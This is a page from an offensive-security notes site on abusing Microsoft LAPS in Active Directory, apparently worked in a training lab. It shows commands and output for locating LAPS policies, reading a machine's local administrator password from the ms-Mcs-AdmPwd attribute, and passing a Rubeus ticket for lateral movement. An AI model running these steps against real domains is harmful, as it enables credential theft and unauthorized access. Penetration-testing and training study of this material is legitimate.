📖
sheepwall
  • Overview
  • Cloud Hacking
    • Azure
  • Hacking
    • Recon
      • Nmap
      • Website Recon
      • Service Enumeration
    • Exploitation
      • GraphQL
      • Application Attacks
      • Web Server Attacks
      • JSON attacks
      • CMS attacks
      • SQL Injection
      • Cross Site Scripting
      • Command Injection
      • SSRF
      • SSTI
      • Server Includes
      • XXE
      • WSDL/SOAP
      • Serialization Attacks
      • Cryptography
      • JWT
    • Installation
      • File Uploads
      • File Transfers
    • Actions on Objectives
      • Networking
      • Linux
    • Tools
    • Windows
      • 1. Getting Foothold
      • 2. Windows Exploitation
      • 3. Enumerating Active Directory
      • 4. Dumping Credentials
      • 5. Lateral Movement
      • 6. Persistence
      • 7. Active Directory
      • 8. LAPS
  • Bug Bounties
    • SSRF to Envoy Admin Page
    • Leaky Error Messages
    • HTTP verb tampering results in administrator role to the application
  • APT Information
    • DFIR Summary
Powered by GitBook
On this page
  • Finding Presence
  • Downloading Info
  • Impersonating users who can access LAPS
  1. Hacking
  2. Windows

8. LAPS

Finding Presence

If it's applied to a machine that you have access to, AdmPwd.dll will be on disk.

ls C:\\Program Files\\LAPS\\CSE

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
 179kb    fil     05/05/2021 07:04:14   AdmPwd.dll

We could also search for GPOs that have "LAPS" or some other descriptive term in the name.

powershell Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl

usncreated               : 25966
displayname              : LAPS
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{C6DC5466-785
                           A-11D2-84D0-00C04FB169F7}{942A8E4F-A261-11D1-A760-00C04FB9603F}][{D76B9641-3288-4F75-942D-08
                           7DE603E3EA}{D02B1F72-3407-48AE-BA88-E8213C6761F1}]
whenchanged              : 8/16/2022 12:39:45 PM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 26068
dscorepropagationdata    : {9/7/2022 1:05:58 PM, 1/1/1601 12:00:00 AM}
name                     : {2BE4337D-D231-4D23-A029-7B999885E659} # GPO ID

As well as computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null

powershell Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName

dnshostname
-----------
wkstn-2.dev.cyberbotic.io
web.dev.cyberbotic.io
sql-2.dev.cyberbotic.io
wkstn-1.dev.cyberbotic.io

Downloading Info

If we locate the correct GPO, we can download the LAPS configuration from the gpcfilesyspath.

ls \\\\dev.cyberbotic.io\\SysVol\\dev.cyberbotic.io\\Policies\\{2BE4337D-D231-4D23-A029-7B999885E659}\\Machine

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/16/2022 12:39:19   Applications
          dir     09/13/2022 15:38:58   Microsoft
          dir     08/16/2022 12:23:37   Preferences
          dir     08/16/2022 12:21:04   Scripts
 575b     fil     08/16/2022 12:22:23   comment.cmtx
 920b     fil     08/16/2022 12:22:23   Registry.pol

beacon> download \\\\dev.cyberbotic.io\\SysVol\\dev.cyberbotic.io\\Policies\\{2BE4337D-D231-4D23-A029-7B999885E659}\\Machine\\Registry.pol
[*] started download of \\\\dev.cyberbotic.io\\SysVol\\dev.cyberbotic.io\\Policies\\{2BE4337D-D231-4D23-A029-7B999885E659}\\Machine\\Registry.pol (920 bytes)
[*] download of Registry.pol is complete

Parse-PolFile to convert this file into human-readable format.

PS C:\\Users\\Attacker> Parse-PolFile .\\Desktop\\Registry.pol

KeyName     : Software\\Policies\\Microsoft Services\\AdmPwd
ValueName   : PasswordComplexity
ValueType   : REG_DWORD
ValueLength : 4
ValueData   : 3

KeyName     : Software\\Policies\\Microsoft Services\\AdmPwd
ValueName   : PasswordLength
ValueType   : REG_DWORD
ValueLength : 4
ValueData   : 14

KeyName     : Software\\Policies\\Microsoft Services\\AdmPwd
ValueName   : PasswordAgeDays
ValueType   : REG_DWORD
ValueLength : 4
ValueData   : 30

Impersonating users who can access LAPS

Discover which principals are allowed to read the ms-Mcs-AdmPwd attribute

powershell Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier | fl

ObjectDN                                                      SecurityIdentifier
--------                                                      ------------------
CN=WKSTN-2,OU=Workstations,DC=dev,DC=cyberbotic,DC=io         S-1-5-21-569305411-121244042-2357301523-1107
CN=WEB,OU=Web Servers,OU=Servers,DC=dev,DC=cyberbotic,DC=io   S-1-5-21-569305411-121244042-2357301523-1108
CN=SQL-2,OU=SQL Servers,OU=Servers,DC=dev,DC=cyberbotic,DC=io S-1-5-21-569305411-121244042-2357301523-1108
CN=WKSTN-1,OU=Workstations,DC=dev,DC=cyberbotic,DC=io         S-1-5-21-569305411-121244042-2357301523-1107
powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
DEV\\Developers

beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1108
DEV\\Support Engineers

Users in Developers group and Support Engineers group can read the LAPS password

powershell Get-DomainComputer -Identity wkstn-1 -Properties ms-Mcs-AdmPwd

ms-mcs-admpwd
-------------
1N3FyjJR5L18za

Create a TGT using the LAPS credentials and pass the ticket

C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:LapsAdmin /password:1N3FyjJR5L18za/nowrap
C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe createnetonly /program:C:\\Windows\\System32\\cmd.exe /domain:DEV /username:LapsAdmin /password:FakePass /ticket:doIFwj[...]MuSU8= /ptt
Previous7. Active DirectoryNextSSRF to Envoy Admin Page

Last updated 1 year ago